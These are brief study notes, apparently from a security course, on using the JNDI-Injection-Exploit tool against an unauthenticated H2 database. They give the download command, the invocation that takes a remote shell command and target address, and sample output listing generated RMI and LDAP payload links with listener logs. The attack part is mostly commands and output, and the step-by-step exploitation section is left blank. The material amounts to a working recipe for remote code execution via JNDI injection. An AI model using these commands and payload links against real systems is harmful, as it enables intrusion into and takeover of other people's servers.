[Notes] JNDI-Injection-Exploit Study Notes

Preface

JNDI-Injection-Exploit is a tool for generating workable JNDI links and provides background services by starting an RMI server, LDAP server and HTTP server. The RMI server and LDAP server are based on marshals and modified further to link with the HTTP server. (GitHub)

Downloading the project

wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

H2 database unauthenticated access

Exploitation prerequisites

  • Ports 1099, 1389 and 8180 on the attacker's machine must not already be in use

Starting the listeners

<shell>: the shell command to be executed remotely
<ip>: the victim's IP address

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C <shell> -A <ip>

[ADDRESS] >> 127.0.0.1
[COMMAND] >> whoami
----------------------------JNDI Links----------------------------
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/9anzqx
ldap://127.0.0.1:1389/9anzqx
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://127.0.0.1:1099/67c5rl
ldap://127.0.0.1:1389/67c5rl
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://127.0.0.1:1099/mukhs6

----------------------------Server Log----------------------------
2024-06-14 17:10:30 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2024-06-14 17:10:30 [RMISERVER] >> Listening on 0.0.0.0:1099
2024-06-14 17:10:30 [LDAPSERVER] >> Listening on 0.0.0.0:1389

Exploitation

Done.

References

Bilibili: xiaodisec